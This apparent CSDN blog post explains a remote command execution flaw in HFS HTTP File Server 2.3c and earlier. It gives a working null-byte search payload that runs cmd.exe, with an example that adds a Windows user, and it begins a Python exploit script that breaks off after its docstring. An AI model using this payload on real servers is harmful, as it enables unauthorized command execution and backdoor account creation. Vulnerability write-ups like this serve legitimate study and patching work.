HFS的远程命令执行漏洞(RCE)

本文介绍了HFS HTTP文件服务器2.3c及其以前版本中的远程命令执行漏洞,该漏洞源于parserLib.pas文件处理空字节不当,允许远程攻击者通过特定payload执行任意程序。攻击者可以使用'findMacroMarker'函数中的'%00'序列发起攻击,例如执行'cmd.exe /c net user test1234 1234 /add.'命令。此漏洞利用需HFS以管理员权限运行。
摘要由CSDN通过智能技术生成

一、HFS漏洞

1、影响版本 : 2.3c以前的2.3x版本

2、HFS:

HFS是HTTP File Server,国外的一款HTTP 文件服务器软件,简单易上手。

3、漏洞描述:

HTTP File Server是一款专为个人用户所设计的HTTP文件服务器,它提供虚拟档案系统,支持新增、移除虚拟档案资料夹等。

Rejetto HTTP File Server 2.3c及之前版本中的parserLib.pas文件中的‘findMacroMarker’函数中存在安全漏洞,该漏洞源于parserLib.pas文件没有正确处理空字节。远程攻击者可借助搜索操作中的‘%00’序列利用该漏洞执行任意程序。

4、攻击payload及过程:

4.1 Payload:http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c [Command-String].}

4.2攻击过程实例:

http://127.0.0.1:8080/?search==%00{.exec|cmd.exe /c net user test1234 1234 /add.}

说明这个OK的前提是HFS以管理员权限运行: 

5、payload:

 1 #-*- coding:utf-8 -*-
 2 
 3 """
 4 这个脚本是检测是否有HFS漏洞的
 5 当HFS版本处于2.3c机器之前的HFS2.3x版本均可以
 6 当HFS以管理员身份运行时候可以get-shell
 7 原理是创建一个新用户,设置密码和权限,然后你就可以RDP了
 8 """
 9 
10 #引入依赖的包、库文件
11 import time
12 import uuid
13 import requests
14 from optparse import OptionParser
15 
16 
17 #定义扫描类
18 class
  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值